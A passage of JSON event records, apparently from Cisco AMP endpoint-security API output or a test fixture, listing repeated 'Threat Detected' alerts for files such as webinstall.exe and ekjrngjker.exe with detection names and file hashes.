Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258680699224148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":428000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668365670547486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668365670547000,"timestamp":1610705756,"timestamp_nanoseconds":9000000,"date":"2021-01-15T10:15:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580189","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668361375580000,"timestamp":1610705755,"timestamp_nanoseconds":616000000,"date":"2021-01-15T10:15:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668361375580188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258629159617000,"timestamp":1610705752,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:15:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258629159616595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258577620009000,"timestamp":1610705740,"timestamp_nanoseconds":637000000,"date":"2021-01-15T10:15:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258577620009042","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258526080401000,"timestamp":1610705728,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:15:28+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258526080401489","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258474540794000,"timestamp":1610705716,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:15:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258474540793936","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258423001186000,"timestamp":1610705704,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:15:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258423001186383","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668099382575000,"timestamp":1610705694,"timestamp_nanoseconds":696000000,"date":"2021-01-15T10:14:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668099382575128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258371461579000,"timestamp":1610705692,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:14:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258371461578830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258324216938000,"timestamp":1610705681,"timestamp_nanoseconds":403000000,"date":"2021-01-15T10:14:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258324216938573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258272677331000,"timestamp":1610705669,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:14:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258272677331020","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258221137723000,"timestamp":1610705657,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:14:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258221137723467","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258169598116000,"timestamp":1610705645,"timestamp_nanoseconds":648000000,"date":"2021-01-15T10:14:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258169598115914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 